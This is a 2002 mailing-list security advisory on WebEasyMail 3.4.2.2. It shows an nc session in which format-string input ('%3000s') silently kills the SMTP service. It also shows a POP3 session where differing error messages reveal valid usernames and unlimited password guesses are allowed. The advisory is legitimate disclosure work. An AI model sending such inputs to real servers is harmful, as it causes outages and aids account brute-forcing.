OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Stan Bubrouski (stan_at_ccs.neu.edu)
Date: Mon Aug 19 2002 - 19:54:24 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Author: Stan Bubrouski
    Date: August 19, 2002
    Product: WebEasyMail
    Versions Affected: 3.4.2.2 (Latest) + previous
    Severity: Denial of Service on SMTP and POP3 portions
    of the software. It has not been investigated but
    there might be a possibility of exploitation to
    execute code remotely.

    Problem #1: The problem appears to lie in the SMTP
    portion of WebEasyMail. When you send specially
    crafted format strings such as the printf family
    of functions use, it is possible to cause the
    service process to exit. While no crash dialog
    appears, the service is terminated without an
    error message or such, and nothing appears in the
    logs.

    As an example:
    $ nc localhost 25
    220 ESMTP on WebEasyMail [3.4.2.2] ready. http://www.winwebmail.com
    %2
    502 Error: command not implemented
    %2s
    502 Error: command not implemented
    %100s
    502 Error: command not implemented
    %3000s
    [emsrv.exe silently dies here]
    $

    I have had no time to debug this problem so I do not
    know if it is exploitable. The fact that it silently
    exits may be an indication of internal error handling,
    but it seems unlikely and I can't comment on it.

    Problem #2: WebEasyMail's POP3 server appears to be
    very weak in the prevent-brute-force attacks
    department. First off it allows for the discovery
    of valid usernames by bugs in its output, for
    example:

    OK POP3 on WebEasyMail [3.4.2.2] ready. http://www.winwebmail.com
    user dog
    +OK user accepted
    pass dog
    -ERR invalid username
    user test
    +OK user accepted
    pass dog
    -ERR wrong password for this user

    Notice that when I wrong password is given, the
    server responds with "-ERR invalid username" if
    the user does not exist, and "-ERR wrong password for this user"
    if the user does indeed exist. Furthermore it
    seems to allow an unlimited number of guesses of
    usernames and passwords without disconnecting the
    remote connection. This coupled with the above
    makes brute force attacks much much easier.

    Vendor Status: I sent a message to the vendor of
    WebEasyMail (supportwinwebmail.com) twice, first
    on August 2, 2002 and August 8, 2002 but recieved
    no response. As a result of the lack of response
    or even acknowledgement my messages were recieved
    this advisory has been released.